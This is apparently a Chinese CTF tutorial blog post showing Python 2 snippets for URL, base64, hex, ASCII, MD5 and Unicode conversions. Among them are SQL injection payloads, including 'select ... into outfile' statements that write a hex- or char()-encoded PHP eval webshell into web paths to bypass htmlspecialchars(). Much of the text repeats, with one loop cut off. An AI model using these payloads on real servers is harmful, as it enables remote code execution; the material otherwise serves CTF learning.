python 重定向 ctf_使用python编写ctf日常编码转换

当然也有很多的在线编码与解码的网址，但是俗话说的好：”人生苦短，我用python“

-< 不说了，开写：

URL编码与解码

url编码

from urllib import *

quote("union select null,null,null from null")

'union%20select%20null%2Cnull%2Cnull%20from%20null'

url解码

unquote("union%20select%20null%2Cnull%2Cnull%20from%20null")

'union select null,null,null from null'

url键值对key-value编码

data={

... 'a':'testing',

... 'name':'侯亮平'

... }

urlencode(data)

'a=testing&name=%E4%BE%AF%E4%BA%AE%E5%B9%B3'

base64

import base64

base64.b64encode("aurora")

'YXVyb3Jh'

base64.b64decode("YXVyb3Jh")

'aurora'

base64.b32encode("aurora")

'MF2XE33SME======'

base64.b32decode("MF2XE33SME======")

'aurora'

Hex

MySQL注入可以使用hex绕过htmlspecialchars()函数从而写入webshell。

select 3c3f70687020406576616c28245f504f53545b2274657374225d293b203f3e into outfile '/web66/login.php'

hexEncode

'<?php @eval($_POST["test"]); ?>'.encode('hex')

'3c3f70687020406576616c28245f504f53545b2274657374225d293b203f3e'

hexDecode

print "3c3f70687020406576616c28245f504f53545b2274657374225d293b203f3e".decode('hex')

Ascii

MySQL中的char()函数则是转换ascii码的，正因如此，也可以使用这个特性来绕过htmlspecialchars()函数。

select char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62) into outfile '/web88/login.php'

map(ord,"<?php phpinfo()?>")

[60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 63, 62]

print chr(112)

p

list=[60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 63, 62]

for index in list:

url键值对key-value编码

>>> data={

... 'a':'testing',

... 'name':'侯亮平'

... }

>>> urlencode(data)

'a=testing&name=%E4%BE%AF%E4%BA%AE%E5%B9%B3'

>>>

base64

>>> import base64

>>> base64.b64encode("aurora")

'YXVyb3Jh'

>>> base64.b64decode("YXVyb3Jh")

'aurora'

>>>

>>> base64.b32encode("aurora")

'MF2XE33SME======'

>>> base64.b32decode("MF2XE33SME======")

'aurora'

>>>

___

Hex

MySQL注入可以使用hex绕过htmlspecialchars()函数从而写入webshell。

select 3c3f70687020406576616c28245f504f53545b2274657374225d293b203f3e into outfile '/web66/login.php'

hexEncode

>>> '<?php @eval($_POST["test"]); ?>'.encode('hex')

'3c3f70687020406576616c28245f504f53545b2274657374225d293b203f3e'

>>>

hexDecode

>>> print "3c3f70687020406576616c28245f504f53545b2274657374225d293b203f3e".decode('hex')

>>>

Ascii

MySQL中的char()函数则是转换ascii码的，正因如此，也可以使用这个特性来绕过htmlspecialchars()函数。

select char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62) into outfile '/web88/login.php'

>>> map(ord,"<?php phpinfo()?>")

[60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 63, 62]

>>>

>>> print chr(112)

p

>>>

>>> list=[60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 63, 62]

>>>

>>> for index in list:

... print chr(index),

...

< ? p h p p h p i n f o ( ) ? >

MD5

md5在web安全界可以说是人尽皆知了，以他的不可逆性，大多数网站存储用户密码等关键数据时常常使用md5加密。有的时候我们提交payload需要md5加密，这个时候用下面的方法就可以轻松实现。当然解密的话推荐去chamd5。

from hashlib import md5

m=md5()

m.update("secret md5")

m.hexdigest()

'a437fd3a567efa56f3f08666e516bd26'

Unicode转中文

unicode转换中文，很多情况下都能遇到。尤其是在做渗透测试的时候。用burp的话会存在中文乱码的问题，在python下实现非常简单

print u"\u4f60\u9700\u8981\u767b\u9646"

你需要登陆

不得不提的是，在ctf竞赛中还是需要使用python脚本去重新定义编码的，多多领悟就好.>-<